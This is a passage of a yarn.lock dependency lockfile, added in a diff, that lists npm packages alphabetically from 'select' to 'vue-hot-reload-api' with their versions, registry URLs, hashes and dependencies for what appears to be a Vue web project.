"https://registry.yarnpkg.com/select/-/select-1.1.2.tgz#0e7350acdec80b1108528786ec1d4418d11b396d" + +semver-diff@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/semver-diff/-/semver-diff-2.1.0.tgz#4bbb8437c8d37e4b0cf1a68fd726ec6d645d6d36" + dependencies: + semver "^5.0.3" + +"semver@2 || 3 || 4 || 5", semver@^5.0.3, semver@^5.1.0, semver@^5.3.0, semver@^5.4.1, semver@^5.5.0: + version "5.5.0" + resolved "https://registry.yarnpkg.com/semver/-/semver-5.5.0.tgz#dc4bbc7a6ca9d916dee5d43516f0092b58f7b8ab" + +serialize-javascript@^1.3.0, serialize-javascript@^1.4.0: + version "1.5.0" + resolved "https://registry.yarnpkg.com/serialize-javascript/-/serialize-javascript-1.5.0.tgz#1aa336162c88a890ddad5384baebc93a655161fe" + +set-blocking@~2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/set-blocking/-/set-blocking-2.0.0.tgz#045f9782d011ae9a6803ddd382b24392b3d890f7" + +set-immediate-shim@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/set-immediate-shim/-/set-immediate-shim-1.0.1.tgz#4b2b1b27eb808a9f8dcc481a58e5e56f599f3f61" + +set-value@^0.4.3: + version "0.4.3" + resolved "https://registry.yarnpkg.com/set-value/-/set-value-0.4.3.tgz#7db08f9d3d22dc7f78e53af3c3bf4666ecdfccf1" + dependencies: + extend-shallow "^2.0.1" + is-extendable "^0.1.1" + is-plain-object "^2.0.1" + to-object-path "^0.3.0" + +set-value@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/set-value/-/set-value-2.0.0.tgz#71ae4a88f0feefbbf52d1ea604f3fb315ebb6274" + dependencies: + extend-shallow "^2.0.1" + is-extendable "^0.1.1" + is-plain-object "^2.0.3" + split-string "^3.0.1" + +setimmediate@^1.0.4: + version "1.0.5" + resolved "https://registry.yarnpkg.com/setimmediate/-/setimmediate-1.0.5.tgz#290cbb232e306942d7d7ea9b83732ab7856f8285" + +setprototypeof@1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/setprototypeof/-/setprototypeof-1.1.0.tgz#d0bd85536887b6fe7c0d818cb962d9d91c54e656" + +sha.js@^2.4.0, sha.js@^2.4.8: + version "2.4.11" + resolved "https://registry.yarnpkg.com/sha.js/-/sha.js-2.4.11.tgz#37a5cf0b81ecbc6943de109ba2960d1b26584ae7" + dependencies: + inherits "^2.0.1" + safe-buffer "^5.0.1" + +shebang-command@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/shebang-command/-/shebang-command-1.2.0.tgz#44aac65b695b03398968c39f363fee5deafdf1ea" + dependencies: + shebang-regex "^1.0.0" + +shebang-regex@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/shebang-regex/-/shebang-regex-1.0.0.tgz#da42f49740c0b42db2ca9728571cb190c98efea3" + +signal-exit@^3.0.0, signal-exit@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/signal-exit/-/signal-exit-3.0.2.tgz#b5fdc08f1287ea1178628e415e25132b73646c6d" + +slash@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/slash/-/slash-1.0.0.tgz#c41f2f6c39fc16d1cd17ad4b5d896114ae470d55" + +slice-ansi@1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/slice-ansi/-/slice-ansi-1.0.0.tgz#044f1a49d8842ff307aad6b505ed178bd950134d" + dependencies: + is-fullwidth-code-point "^2.0.0" + +snapdragon-node@^2.0.1: + version "2.1.1" + resolved "https://registry.yarnpkg.com/snapdragon-node/-/snapdragon-node-2.1.1.tgz#6c175f86ff14bdb0724563e8f3c1b021a286853b" + dependencies: + define-property "^1.0.0" + isobject "^3.0.0" + snapdragon-util "^3.0.1" + +snapdragon-util@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/snapdragon-util/-/snapdragon-util-3.0.1.tgz#f956479486f2acd79700693f6f7b805e45ab56e2" + dependencies: + kind-of "^3.2.0" + +snapdragon@^0.8.1: + version "0.8.2" + resolved "https://registry.yarnpkg.com/snapdragon/-/snapdragon-0.8.2.tgz#64922e7c565b0e14204ba1aa7d6964278d25182d" + dependencies: + base "^0.11.1" + debug "^2.2.0" + define-property "^0.2.5" + extend-shallow "^2.0.1" + map-cache "^0.2.2" + source-map "^0.5.6" + source-map-resolve "^0.5.0" + use "^3.1.0" + +sort-keys@^1.0.0: + version "1.1.2" + resolved "https://registry.yarnpkg.com/sort-keys/-/sort-keys-1.1.2.tgz#441b6d4d346798f1b4e49e8920adfba0e543f9ad" + dependencies: + is-plain-obj "^1.0.0" + +source-list-map@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/source-list-map/-/source-list-map-2.0.0.tgz#aaa47403f7b245a92fbc97ea08f250d6087ed085" + +source-map-resolve@^0.5.0: + version "0.5.2" + resolved "https://registry.yarnpkg.com/source-map-resolve/-/source-map-resolve-0.5.2.tgz#72e2cc34095543e43b2c62b2c4c10d4a9054f259" + dependencies: + atob "^2.1.1" + decode-uri-component "^0.2.0" + resolve-url "^0.2.1" + source-map-url "^0.4.0" + urix "^0.1.0" + +source-map-url@^0.4.0: + version "0.4.0" + resolved "https://registry.yarnpkg.com/source-map-url/-/source-map-url-0.4.0.tgz#3e935d7ddd73631b97659956d55128e87b5084a3" + +source-map@0.1.x: + version "0.1.43" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.1.43.tgz#c24bc146ca517c1471f5dacbe2571b2b7f9e3346" + dependencies: + amdefine ">=0.0.4" + +source-map@0.5.6: + version "0.5.6" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.5.6.tgz#75ce38f52bf0733c5a7f0c118d81334a2bb5f412" + +source-map@0.5.x, source-map@^0.5.0, source-map@^0.5.3, source-map@^0.5.6: + version "0.5.7" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.5.7.tgz#8a039d2d1021d22d1ea14c80d8ea468ba2ef3fcc" + +source-map@^0.6.1, source-map@~0.6.1: + version "0.6.1" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.6.1.tgz#74722af32e9614e9c287a8d0bbde48b5e2f1a263" + +spdx-correct@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/spdx-correct/-/spdx-correct-3.0.0.tgz#05a5b4d7153a195bc92c3c425b69f3b2a9524c82" + dependencies: + spdx-expression-parse "^3.0.0" + spdx-license-ids "^3.0.0" + +spdx-exceptions@^2.1.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/spdx-exceptions/-/spdx-exceptions-2.1.0.tgz#2c7ae61056c714a5b9b9b2b2af7d311ef5c78fe9" + +spdx-expression-parse@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/spdx-expression-parse/-/spdx-expression-parse-3.0.0.tgz#99e119b7a5da00e05491c9fa338b7904823b41d0" + dependencies: + spdx-exceptions "^2.1.0" + spdx-license-ids "^3.0.0" + +spdx-license-ids@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/spdx-license-ids/-/spdx-license-ids-3.0.0.tgz#7a7cd28470cc6d3a1cfe6d66886f6bc430d3ac87" + +split-string@^3.0.1, split-string@^3.0.2: + version "3.1.0" + resolved "https://registry.yarnpkg.com/split-string/-/split-string-3.1.0.tgz#7cb09dda3a86585705c64b39a6466038682e8fe2" + dependencies: + extend-shallow "^3.0.0" + +sprintf-js@~1.0.2: + version "1.0.3" + resolved "https://registry.yarnpkg.com/sprintf-js/-/sprintf-js-1.0.3.tgz#04e6926f662895354f3dd015203633b857297e2c" + +ssri@^5.2.4: + version "5.3.0" + resolved "https://registry.yarnpkg.com/ssri/-/ssri-5.3.0.tgz#ba3872c9c6d33a0704a7d71ff045e5ec48999d06" + dependencies: + safe-buffer "^5.1.1" + +static-extend@^0.1.1: + version "0.1.2" + resolved "https://registry.yarnpkg.com/static-extend/-/static-extend-0.1.2.tgz#60809c39cbff55337226fd5e0b520f341f1fb5c6" + dependencies: + define-property "^0.2.5" + object-copy "^0.1.0" + +"statuses@>= 1.4.0 < 2", statuses@^1.2.0: + version "1.5.0" + resolved "https://registry.yarnpkg.com/statuses/-/statuses-1.5.0.tgz#161c7dac177659fd9811f43771fa99381478628c" + +std-env@^1.1.0, std-env@^1.3.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/std-env/-/std-env-1.3.0.tgz#8ce754a401a61f1ac49c8eb55f2a8c0c63d54954" + dependencies: + is-ci "^1.1.0" + +stream-browserify@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/stream-browserify/-/stream-browserify-2.0.1.tgz#66266ee5f9bdb9940a4e4514cafb43bb71e5c9db" + dependencies: + inherits "~2.0.1" + readable-stream "^2.0.2" + +stream-each@^1.1.0: + version "1.2.2" + resolved "https://registry.yarnpkg.com/stream-each/-/stream-each-1.2.2.tgz#8e8c463f91da8991778765873fe4d960d8f616bd" + dependencies: + end-of-stream "^1.1.0" + stream-shift "^1.0.0" + +stream-http@^2.7.2: + version "2.8.3" + resolved "https://registry.yarnpkg.com/stream-http/-/stream-http-2.8.3.tgz#b2d242469288a5a27ec4fe8933acf623de6514fc" + dependencies: + builtin-status-codes "^3.0.0" + inherits "^2.0.1" + readable-stream "^2.3.6" + to-arraybuffer "^1.0.0" + xtend "^4.0.0" + +stream-shift@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/stream-shift/-/stream-shift-1.0.0.tgz#d5c752825e5367e786f78e18e445ea223a155952" + +stream-slice@^0.1.2: + version "0.1.2" + resolved "https://registry.yarnpkg.com/stream-slice/-/stream-slice-0.1.2.tgz#2dc4f4e1b936fb13f3eb39a2def1932798d07a4b" + +strict-uri-encode@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/strict-uri-encode/-/strict-uri-encode-1.1.0.tgz#279b225df1d582b1f54e65addd4352e18faa0713" + +string-width@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/string-width/-/string-width-1.0.2.tgz#118bdf5b8cdc51a2a7e70d211e07e2b0b9b107d3" + dependencies: + code-point-at "^1.0.0" + is-fullwidth-code-point "^1.0.0" + strip-ansi "^3.0.0" + +"string-width@^1.0.2 || 2", string-width@^2.0.0, string-width@^2.1.1: + version "2.1.1" + resolved "https://registry.yarnpkg.com/string-width/-/string-width-2.1.1.tgz#ab93f27a8dc13d28cac815c462143a6d9012ae9e" + dependencies: + is-fullwidth-code-point "^2.0.0" + strip-ansi "^4.0.0" + +string@^3.3.3, string@~3.3.3: + version "3.3.3" + resolved "https://registry.yarnpkg.com/string/-/string-3.3.3.tgz#5ea211cd92d228e184294990a6cc97b366a77cb0" + +string_decoder@^1.0.0, string_decoder@~1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/string_decoder/-/string_decoder-1.1.1.tgz#9cf1611ba62685d7030ae9e4ba34149c3af03fc8" + dependencies: + safe-buffer "~5.1.0" + +string_decoder@~0.10.x: + version "0.10.31" + resolved "https://registry.yarnpkg.com/string_decoder/-/string_decoder-0.10.31.tgz#62e203bc41766c6c28c9fc84301dab1c5310fa94" + +strip-ansi@^3.0.0, strip-ansi@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-3.0.1.tgz#6a385fb8853d952d5ff05d0e8aaf94278dc63dcf" + dependencies: + ansi-regex "^2.0.0" + +strip-ansi@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-4.0.0.tgz#a8479022eb1ac368a871389b635262c505ee368f" + dependencies: + ansi-regex "^3.0.0" + +strip-bom-string@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/strip-bom-string/-/strip-bom-string-1.0.0.tgz#e5211e9224369fbb81d633a2f00044dc8cedad92" + +strip-bom@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/strip-bom/-/strip-bom-3.0.0.tgz#2334c18e9c759f7bdd56fdef7e9ae3d588e68ed3" + +strip-eof@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/strip-eof/-/strip-eof-1.0.0.tgz#bb43ff5598a6eb05d89b59fcd129c983313606bf" + +strip-indent@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/strip-indent/-/strip-indent-2.0.0.tgz#5ef8db295d01e6ed6cbf7aab96998d7822527b68" + +strip-json-comments@~2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/strip-json-comments/-/strip-json-comments-2.0.1.tgz#3c531942e908c2697c0ec344858c286c7ca0a60a" + +stylus-loader@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/stylus-loader/-/stylus-loader-3.0.2.tgz#27a706420b05a38e038e7cacb153578d450513c6" + dependencies: + loader-utils "^1.0.2" + lodash.clonedeep "^4.5.0" + when "~3.6.x" + +stylus@^0.54.5: + version "0.54.5" + resolved "https://registry.yarnpkg.com/stylus/-/stylus-0.54.5.tgz#42b9560931ca7090ce8515a798ba9e6aa3d6dc79" + dependencies: + css-parse "1.7.x" + debug "*" + glob "7.0.x" + mkdirp "0.5.x" + sax "0.5.x" + source-map "0.1.x" + +supports-color@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-2.0.0.tgz#535d045ce6b6363fa40117084629995e9df324c7" + +supports-color@^3.2.3: + version "3.2.3" + resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-3.2.3.tgz#65ac0504b3954171d8a64946b2ae3cbb8a5f54f6" + dependencies: + has-flag "^1.0.0" + +supports-color@^5.3.0, supports-color@^5.4.0: + version "5.4.0" + resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-5.4.0.tgz#1c6b337402c2137605efe19f10fec390f6faab54" + dependencies: + has-flag "^3.0.0" + +svgo@^0.7.0: + version "0.7.2" + resolved "https://registry.yarnpkg.com/svgo/-/svgo-0.7.2.tgz#9f5772413952135c6fefbf40afe6a4faa88b4bb5" + dependencies: + coa "~1.0.1" + colors "~1.1.2" + csso "~2.3.1" + js-yaml "~3.7.0" + mkdirp "~0.5.1" + sax "~1.2.1" + whet.extend "~0.9.9" + +table@^4.0.3: + version "4.0.3" + resolved "https://registry.yarnpkg.com/table/-/table-4.0.3.tgz#00b5e2b602f1794b9acaf9ca908a76386a7813bc" + dependencies: + ajv "^6.0.1" + ajv-keywords "^3.0.0" + chalk "^2.1.0" + lodash "^4.17.4" + slice-ansi "1.0.0" + string-width "^2.1.1" + +tapable@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/tapable/-/tapable-1.0.0.tgz#cbb639d9002eed9c6b5975eb20598d7936f1f9f2" + +tar@^4: + version "4.4.4" + resolved "https://registry.yarnpkg.com/tar/-/tar-4.4.4.tgz#ec8409fae9f665a4355cc3b4087d0820232bb8cd" + dependencies: + chownr "^1.0.1" + fs-minipass "^1.2.5" + minipass "^2.3.3" + minizlib "^1.1.0" + mkdirp "^0.5.0" + safe-buffer "^5.1.2" + yallist "^3.0.2" + +term-size@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/term-size/-/term-size-1.2.0.tgz#458b83887f288fc56d6fffbfad262e26638efa69" + dependencies: + execa "^0.7.0" + +text-table@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/text-table/-/text-table-0.2.0.tgz#7f5ee823ae805207c00af2df4a84ec3fcfa570b4" + +thenify-all@^1.0.0: + version "1.6.0" + resolved "https://registry.yarnpkg.com/thenify-all/-/thenify-all-1.6.0.tgz#1a1918d402d8fc3f98fbf234db0bcc8cc10e9726" + dependencies: + thenify ">= 3.1.0 < 4" + +"thenify@>= 3.1.0 < 4": + version "3.3.0" + resolved "https://registry.yarnpkg.com/thenify/-/thenify-3.3.0.tgz#e69e38a1babe969b0108207978b9f62b88604839" + dependencies: + any-promise "^1.0.0" + +through2@^2.0.0: + version "2.0.3" + resolved "https://registry.yarnpkg.com/through2/-/through2-2.0.3.tgz#0004569b37c7c74ba39c43f3ced78d1ad94140be" + dependencies: + readable-stream "^2.1.5" + xtend "~4.0.1" + +through@~2.3.4: + version "2.3.8" + resolved "https://registry.yarnpkg.com/through/-/through-2.3.8.tgz#0dd4c9ffaabc357960b1b724115d7e0e86a2e1f5" + +time-fix-plugin@^2.0.0: + version "2.0.3" + resolved "https://registry.yarnpkg.com/time-fix-plugin/-/time-fix-plugin-2.0.3.tgz#b6b1ead519099bc621e28edb77dac7531918b7e1" + +timed-out@^4.0.0: + version "4.0.1" + resolved "https://registry.yarnpkg.com/timed-out/-/timed-out-4.0.1.tgz#f32eacac5a175bea25d7fab565ab3ed8741ef56f" + +timers-browserify@^2.0.4: + version "2.0.10" + resolved "https://registry.yarnpkg.com/timers-browserify/-/timers-browserify-2.0.10.tgz#1d28e3d2aadf1d5a5996c4e9f95601cd053480ae" + dependencies: + setimmediate "^1.0.4" + +tiny-emitter@^2.0.0: + version "2.0.2" + resolved "https://registry.yarnpkg.com/tiny-emitter/-/tiny-emitter-2.0.2.tgz#82d27468aca5ade8e5fd1e6d22b57dd43ebdfb7c" + +to-arraybuffer@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/to-arraybuffer/-/to-arraybuffer-1.0.1.tgz#7d229b1fcc637e466ca081180836a7aabff83f43" + +to-factory@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/to-factory/-/to-factory-1.0.0.tgz#8738af8bd97120ad1d4047972ada5563bf9479b1" + +to-fast-properties@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/to-fast-properties/-/to-fast-properties-2.0.0.tgz#dc5e698cbd079265bc73e0377681a4e4e83f616e" + +to-object-path@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/to-object-path/-/to-object-path-0.3.0.tgz#297588b7b0e7e0ac08e04e672f85c1f4999e17af" + dependencies: + kind-of "^3.0.2" + +to-regex-range@^2.1.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/to-regex-range/-/to-regex-range-2.1.1.tgz#7c80c17b9dfebe599e27367e0d4dd5590141db38" + dependencies: + is-number "^3.0.0" + repeat-string "^1.6.1" + +to-regex@^3.0.1, to-regex@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/to-regex/-/to-regex-3.0.2.tgz#13cfdd9b336552f30b51f33a8ae1b42a7a7599ce" + dependencies: + define-property "^2.0.2" + extend-shallow "^3.0.2" + regex-not "^1.0.2" + safe-regex "^1.1.0" + +toml@^2.3.3: + version "2.3.3" + resolved "https://registry.yarnpkg.com/toml/-/toml-2.3.3.tgz#8d683d729577cb286231dfc7a8affe58d31728fb" + +topo@2.x.x: + version "2.0.2" + resolved "https://registry.yarnpkg.com/topo/-/topo-2.0.2.tgz#cd5615752539057c0dc0491a621c3bc6fbe1d182" + dependencies: + hoek "4.x.x" + +toposort@^1.0.0: + version "1.0.7" + resolved "https://registry.yarnpkg.com/toposort/-/toposort-1.0.7.tgz#2e68442d9f64ec720b8cc89e6443ac6caa950029" + +trim-newlines@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/trim-newlines/-/trim-newlines-2.0.0.tgz#b403d0b91be50c331dfc4b82eeceb22c3de16d20" + +trim-right@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/trim-right/-/trim-right-1.0.1.tgz#cb2e1203067e0c8de1f614094b9fe45704ea6003" + +tslib@^1.9.0: + version "1.9.3" + resolved "https://registry.yarnpkg.com/tslib/-/tslib-1.9.3.tgz#d7e4dd79245d85428c4d7e4822a79917954ca286" + +tty-browserify@0.0.0: + version "0.0.0" + resolved "https://registry.yarnpkg.com/tty-browserify/-/tty-browserify-0.0.0.tgz#a157ba402da24e9bf957f9aa69d524eed42901a6" + +tunnel-agent@^0.6.0: + version "0.6.0" + resolved "https://registry.yarnpkg.com/tunnel-agent/-/tunnel-agent-0.6.0.tgz#27a5dea06b36b04a0a9966774b290868f0fc40fd" + dependencies: + safe-buffer "^5.0.1" + +type-is@^1.5.5: + version "1.6.16" + resolved "https://registry.yarnpkg.com/type-is/-/type-is-1.6.16.tgz#f89ce341541c672b25ee7ae3c73dee3b2be50194" + dependencies: + media-typer "0.3.0" + mime-types "~2.1.18" + +typedarray@^0.0.6: + version "0.0.6" + resolved "https://registry.yarnpkg.com/typedarray/-/typedarray-0.0.6.tgz#867ac74e3864187b1d3d47d996a78ec5c8830777" + +uc.micro@^1.0.1, uc.micro@^1.0.5: + version "1.0.5" + resolved "https://registry.yarnpkg.com/uc.micro/-/uc.micro-1.0.5.tgz#0c65f15f815aa08b560a61ce8b4db7ffc3f45376" + +uglify-es@^3.3.4: + version "3.3.9" + resolved "https://registry.yarnpkg.com/uglify-es/-/uglify-es-3.3.9.tgz#0c1c4f0700bed8dbc124cdb304d2592ca203e677" + dependencies: + commander "~2.13.0" + source-map "~0.6.1" + +uglify-js@3.3.x: + version "3.3.28" + resolved "https://registry.yarnpkg.com/uglify-js/-/uglify-js-3.3.28.tgz#0efb9a13850e11303361c1051f64d2ec68d9be06" + dependencies: + commander "~2.15.0" + source-map "~0.6.1" + +uglifyjs-webpack-plugin@^1.2.4: + version "1.2.6" + resolved "https://registry.yarnpkg.com/uglifyjs-webpack-plugin/-/uglifyjs-webpack-plugin-1.2.6.tgz#f4bb44f02431e82b301d8d4624330a6a35729381" + dependencies: + cacache "^10.0.4" + find-cache-dir "^1.0.0" + schema-utils "^0.4.5" + serialize-javascript "^1.4.0" + source-map "^0.6.1" + uglify-es "^3.3.4" + webpack-sources "^1.1.0" + worker-farm "^1.5.2" + +unicode-canonical-property-names-ecmascript@^1.0.4: + version "1.0.4" + resolved "https://registry.yarnpkg.com/unicode-canonical-property-names-ecmascript/-/unicode-canonical-property-names-ecmascript-1.0.4.tgz#2619800c4c825800efdd8343af7dd9933cbe2818" + +unicode-match-property-ecmascript@^1.0.4: + version "1.0.4" + resolved "https://registry.yarnpkg.com/unicode-match-property-ecmascript/-/unicode-match-property-ecmascript-1.0.4.tgz#8ed2a32569961bce9227d09cd3ffbb8fed5f020c" + dependencies: + unicode-canonical-property-names-ecmascript "^1.0.4" + unicode-property-aliases-ecmascript "^1.0.4" + +unicode-match-property-value-ecmascript@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/unicode-match-property-value-ecmascript/-/unicode-match-property-value-ecmascript-1.0.2.tgz#9f1dc76926d6ccf452310564fd834ace059663d4" + +unicode-property-aliases-ecmascript@^1.0.4: + version "1.0.4" + resolved "https://registry.yarnpkg.com/unicode-property-aliases-ecmascript/-/unicode-property-aliases-ecmascript-1.0.4.tgz#5a533f31b4317ea76f17d807fa0d116546111dd0" + +union-value@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/union-value/-/union-value-1.0.0.tgz#5c71c34cb5bad5dcebe3ea0cd08207ba5aa1aea4" + dependencies: + arr-union "^3.1.0" + get-value "^2.0.6" + is-extendable "^0.1.1" + set-value "^0.4.3" + +uniq@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/uniq/-/uniq-1.0.1.tgz#b31c5ae8254844a3a8281541ce2b04b865a734ff" + +uniqs@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/uniqs/-/uniqs-2.0.0.tgz#ffede4b36b25290696e6e165d4a59edb998e6b02" + +unique-filename@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/unique-filename/-/unique-filename-1.1.0.tgz#d05f2fe4032560871f30e93cbe735eea201514f3" + dependencies: + unique-slug "^2.0.0" + +unique-slug@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/unique-slug/-/unique-slug-2.0.0.tgz#db6676e7c7cc0629878ff196097c78855ae9f4ab" + dependencies: + imurmurhash "^0.1.4" + +unique-string@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/unique-string/-/unique-string-1.0.0.tgz#9e1057cca851abb93398f8b33ae187b99caec11a" + dependencies: + crypto-random-string "^1.0.0" + +universalify@^0.1.0: + version "0.1.2" + resolved "https://registry.yarnpkg.com/universalify/-/universalify-0.1.2.tgz#b646f69be3942dabcecc9d6639c80dc105efaa66" + +unset-value@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/unset-value/-/unset-value-1.0.0.tgz#8376873f7d2335179ffb1e6fc3a8ed0dfc8ab559" + dependencies: + has-value "^0.3.1" + isobject "^3.0.0" + +unzip-response@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/unzip-response/-/unzip-response-2.0.1.tgz#d2f0f737d16b0615e72a6935ed04214572d56f97" + +upath@^1.0.5: + version "1.1.0" + resolved "https://registry.yarnpkg.com/upath/-/upath-1.1.0.tgz#35256597e46a581db4793d0ce47fa9aebfc9fabd" + +update-notifier@^2.3.0: + version "2.5.0" + resolved "https://registry.yarnpkg.com/update-notifier/-/update-notifier-2.5.0.tgz#d0744593e13f161e406acb1d9408b72cad08aff6" + dependencies: + boxen "^1.2.1" + chalk "^2.0.1" + configstore "^3.0.0" + import-lazy "^2.1.0" + is-ci "^1.0.10" + is-installed-globally "^0.1.0" + is-npm "^1.0.0" + latest-version "^3.0.0" + semver-diff "^2.0.0" + xdg-basedir "^3.0.0" + +upper-case@^1.1.1: + version "1.1.3" + resolved "https://registry.yarnpkg.com/upper-case/-/upper-case-1.1.3.tgz#f6b4501c2ec4cdd26ba78be7222961de77621598" + +uri-js@^4.2.1: + version "4.2.2" + resolved "https://registry.yarnpkg.com/uri-js/-/uri-js-4.2.2.tgz#94c540e1ff772956e2299507c010aea6c8838eb0" + dependencies: + punycode "^2.1.0" + +urix@^0.1.0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/urix/-/urix-0.1.0.tgz#da937f7a62e21fec1fd18d49b35c2935067a6c72" + +url-join@3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/url-join/-/url-join-3.0.0.tgz#26e8113ace195ea30d0fc38186e45400f9cea672" + +url-join@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/url-join/-/url-join-4.0.0.tgz#4d3340e807d3773bda9991f8305acdcc2a665d2a" + +url-loader@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/url-loader/-/url-loader-1.0.1.tgz#61bc53f1f184d7343da2728a1289ef8722ea45ee" + dependencies: + loader-utils "^1.1.0" + mime "^2.0.3" + schema-utils "^0.4.3" + +url-parse-lax@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/url-parse-lax/-/url-parse-lax-1.0.0.tgz#7af8f303645e9bd79a272e7a14ac68bc0609da73" + dependencies: + prepend-http "^1.0.1" + +url@^0.11.0: + version "0.11.0" + resolved "https://registry.yarnpkg.com/url/-/url-0.11.0.tgz#3838e97cfc60521eb73c525a8e55bfdd9e2e28f1" + dependencies: + punycode "1.3.2" + querystring "0.2.0" + +use@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/use/-/use-3.1.0.tgz#14716bf03fdfefd03040aef58d8b4b85f3a7c544" + dependencies: + kind-of "^6.0.2" + +util-deprecate@~1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/util-deprecate/-/util-deprecate-1.0.2.tgz#450d4dc9fa70de732762fbd2d4a28981419a0ccf" + +util.promisify@1.0.0, util.promisify@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/util.promisify/-/util.promisify-1.0.0.tgz#440f7165a459c9a16dc145eb8e72f35687097030" + dependencies: + define-properties "^1.1.2" + object.getownpropertydescriptors "^2.0.3" + +util@0.10.3: + version "0.10.3" + resolved "https://registry.yarnpkg.com/util/-/util-0.10.3.tgz#7afb1afe50805246489e3db7fe0ed379336ac0f9" + dependencies: + inherits "2.0.1" + +util@^0.10.3: + version "0.10.4" + resolved "https://registry.yarnpkg.com/util/-/util-0.10.4.tgz#3aa0125bfe668a4672de58857d3ace27ecb76901" + dependencies: + inherits "2.0.3" + +utila@~0.3: + version "0.3.3" + resolved "https://registry.yarnpkg.com/utila/-/utila-0.3.3.tgz#d7e8e7d7e309107092b05f8d9688824d633a4226" + +utila@~0.4: + version "0.4.0" + resolved "https://registry.yarnpkg.com/utila/-/utila-0.4.0.tgz#8a16a05d445657a3aea5eecc5b12a4fa5379772c" + +uuid@^3.1.0: + version "3.2.1" + resolved "https://registry.yarnpkg.com/uuid/-/uuid-3.2.1.tgz#12c528bb9d58d0b9265d9a2f6f0fe8be17ff1f14" + +v8-compile-cache@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/v8-compile-cache/-/v8-compile-cache-2.0.0.tgz#526492e35fc616864284700b7043e01baee09f0a" + +validate-npm-package-license@^3.0.1: + version "3.0.3" + resolved "https://registry.yarnpkg.com/validate-npm-package-license/-/validate-npm-package-license-3.0.3.tgz#81643bcbef1bdfecd4623793dc4648948ba98338" + dependencies: + spdx-correct "^3.0.0" + spdx-expression-parse "^3.0.0" + +vary@^1.0.0: + version "1.1.2" + resolved "https://registry.yarnpkg.com/vary/-/vary-1.1.2.tgz#2299f02c6ded30d4a5961b0b9f74524a18f634fc" + +vendors@^1.0.0: + version "1.0.2" + resolved "https://registry.yarnpkg.com/vendors/-/vendors-1.0.2.tgz#7fcb5eef9f5623b156bcea89ec37d63676f21801" + +vm-browserify@0.0.4: + version "0.0.4" + resolved "https://registry.yarnpkg.com/vm-browserify/-/vm-browserify-0.0.4.tgz#5d7ea45bbef9e4a6ff65f95438e0a87c357d5a73" + dependencies: + indexof "0.0.1" + +vue-hot-reload-api@^2.3.0: + version "2.3.0" + resolved 